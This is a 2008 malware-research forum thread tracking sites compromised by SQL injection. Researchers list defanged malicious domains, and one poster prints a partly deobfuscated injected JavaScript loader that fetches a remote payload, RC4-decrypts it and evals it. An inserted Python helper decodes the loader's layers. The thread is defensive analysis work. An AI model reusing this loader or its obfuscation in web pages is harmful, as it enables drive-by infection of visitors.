Author Topic: SQL Injected jscript sites  (Read 70244 times)


June 04, 2008, 03:02:21 pm
Reply #15

YanceySlide

Added:
hxxp://www.win496.com
hxxp://flyzhu.9966.org
hxxp://www.encode72.com
hxxp://www.exec51.com
The Shadowserver Foundation

June 04, 2008, 04:00:42 pm
Reply #16

sowhat-x

Quote
hxxp://fourevent.cn/16.swf
It's the same lamer we've already seen before...
Quote
hxxp://user1.12-27.net/bak.css

June 04, 2008, 04:25:33 pm
Reply #17

sowhat-x

Many swf-infected sites listed here as well...
(JohnC, here comes some extra work, lol! :D )
http://ilion.blog47.fc2.com/blog-entry-46.html
http://ilion.blog47.fc2.com/blog-entry-47.html

June 04, 2008, 11:21:01 pm
Reply #18

JohnC


June 05, 2008, 02:08:01 pm
Reply #19

YanceySlide

We're having some issues with our webserver at the moment, so these haven't been posted to the blog entry.

New:
hxxp://www.tag58.com
hxxp://www.sslput4.com (it's now being injected)
hxxp://www.sslnet72.com
The Shadowserver Foundation

June 05, 2008, 02:27:21 pm
Reply #20

sowhat-x

Quote
We're having some issues with our webserver at the moment...
Tried a couple of hours ago and the site wasn't accessible... but it seems like it's fixed now :)

June 05, 2008, 03:41:57 pm
Reply #21

sowhat-x

From Ilion's blog above...
Quote

June 05, 2008, 07:05:38 pm
Reply #22

JohnC

Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff

There is something on the server which inserts a malicious script into the homepage on the first time you view it, as Bobby stated. And it seems like the same type of script which you saw inserted in /portal/help/.

Since you have spoken with them before and they said feel free to mail them if it happens again, what do you think the chances are of them taking a little look on the server and giving us the script which is causing this. I would be interested to see it.

June 05, 2008, 08:02:31 pm
Reply #23

MysteryFCM

I'll get in touch and find out :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2008, 11:58:28 pm
Reply #24

MysteryFCM

@Bobby,
I've got it decoded as far as the following, adding the vars as the errors borked on them, but it's now borking with an error telling me arguments.callee.toString() is null or not an object?

Code:
var FuqV=75397;
 var Z2Yh=73665;
 var xC=71163;
 var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';
 eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));
 FuqV=FuqV+44051;
 
 var KL, vv, rz1, pv6x, nLej, xC, Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';
 eval(unescape(Mkmo.replace(/Fpo/g,'%')));
 Z2Yh=Z2Yh%KL;
 var Pv6c=80606;
 vv=vv+33901;
 var xEx=18390;
 var D;
 Pv6c=(Pv6c-79890)*(nLej-4095588384);
 FuqV=FuqV%Z2Yh;
 nLej=rz1+D;
 nLej=nLej+xEx;
 xC=(Pv6c-8575844471)*(vv-59581);
 D=xC%nLej;
 var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';
 eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));
 CvQ=new Array();
 var UEma;
 var mi;
 for(UEma=0;
 UEma<256;
 UEma++)
 {
   CvQ[UEma]=UEma;
 }
 mi=arguments.callee.toString();
 mi=mi.replace(/\W/g,'');
 mi=mi.toUpperCase();
 mi+=FuqV;
 var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';
 eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));
 var oGZI;
 for(oGZI=0;
 oGZI<mi.length;
 oGZI++)
 {
   uA^=mi.charCodeAt(oGZI);
   if(oGZI%76==75)
   {
     Txc+=String.fromCharCode(uA);
     uA=183;
   }
   
 }
 if(oGZI%76!=75)
 {
   Txc+=String.fromCharCode(uA);
 }
 mi=Txc;
 var YL=null;
 var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';
 var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';
 if (!YL)
 {
   try
   {
     YL=new XMLHttpRequest();
   }
   catch(e)
   {
     YL=null
   }
   ;
 }
 var ejA=unescape(Cpw);
 if (!YL)
 {
   try
   {
     YL=new ActiveXObject(ejA);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var zzl=unescape(it);
 if (!YL)
 {
   try
   {
     YL=new
     
     ActiveXObject(zzl);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var IOom=SYaX;
 var YH=function()
 {
   Oy = unescape(YL.responseText);
   var XT=0;
   var ZHev;
   for(Go=0;
   Go<256;
   Go++)
   {
     ZHev=Go%mi.length;
     ZHev=mi.charCodeAt(ZHev);
     var U;
U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';
     eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));
   }
   qIpP=0;
   var BUBC;
   
   BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';
   eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));
   var RbLR;
   var RmmL;
   for(RbLR=0;
   RbLR<Oy.length;
   RbLR++)
   {
     qIpP=qIpP+1;
     var De;
De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';
     eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')
     ));
   }
   eval(q);
 }
 ;var
 
 G=function()
 {
   if((YL.readyState==4)&&(YL.status==200))
   {
     YH();
   }
   
 }
 ;//YL.onreadystatechange=G;
 YL.open('GET',IOom,true);
 YL.send(null);

I added // before YL.onready.... just so it would go through with my manual script :) (the manual script just overrides document.write and eval so it dumps it to a file instead)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
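Added example (not code from the thread or from any of the posters): a Python helper that replays the replace chain and unescape() of each eval'd string in the script posted above, so the assignments hidden in them can be read without running the script. The string constants and replacement orders are copied from the posted code; the U layer decodes to the RC4 key-scheduling swap, and the key it uses is folded from arguments.callee.toString(), which is undefined when the body is run at top level and which changes whenever the body is edited.

```python
import re

# Obfuscated strings copied verbatim from the posted script (the arguments
# to each eval(unescape(x.replace(...)...))), with the replace chain in the
# same order the script applies it.
LAYERS = {
    "EjFO": ("KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B",
             [("Ueq", "5"), ("KC", "%"), ("Vn0", "D")]),
    "Mkmo": ("Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B",
             [("Fpo", "%")]),
    "Z3p": ("0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B",
            [("ig", "z"), ("0dS", "N"), ("xzY", "2"), ("Nmi", "%")]),
    "z2lP": ("cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B",
             [("f", "A"), ("V", "0"), ("El", "6"), ("cqe", "%"), ("%J", "8%")]),
    "BUBC": ("daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B",
             [("aR", "J"), ("B%", "1"), ("dJ", "%")]),
    "U": ("9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B",
          [("%g", "M"), ("M1", "%"), ("9", "%5")]),
}


def js_unescape(s: str) -> str:
    """Mirror JavaScript's unescape(): decode %XX and %uXXXX, leave everything else."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def peel(blob: str, steps) -> str:
    """Apply the literal replacements in order, then unescape: this is the text eval() saw.
    str.replace() is left-to-right and non-overlapping, like a /g regex on a literal."""
    for old, new in steps:
        blob = blob.replace(old, new)
    return js_unescape(blob)


def decode_all() -> dict:
    """Decode every layer; the result is plain variable assignments plus the RC4 KSA swap."""
    return {name: peel(blob, steps) for name, (blob, steps) in LAYERS.items()}


if __name__ == "__main__":
    for name, code in decode_all().items():
        print(f"{name}: {code}")
```

The De layer (the per-byte loop) peels the same way with `[("N", "7"), ("G8", "%")]` and is the matching RC4 keystream generator, so the fetched response is only readable with the key the unmodified script computes from itself.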

June 05, 2008, 11:59:32 pm
Reply #25

MysteryFCM

Btw, AntiVir is detecting my amended version as HTML/Crypted.Gen... which is a bit weird as it completely ignored it prior to my modifying the script to correct the errors thrown by it..
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 06, 2008, 05:30:41 am
Reply #26

bobby

Antnet gave a complete solution here for deobfuscating this one:
http://malware-research.co.uk/index.php?topic=8164.0

June 06, 2008, 05:34:04 am
Reply #27

MysteryFCM

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 06, 2008, 01:53:45 pm
Reply #28

YanceySlide

New:
kk6.us
hxxp://www.siteid38.com
The Shadowserver Foundation

June 06, 2008, 05:10:57 pm
Reply #29

JohnC
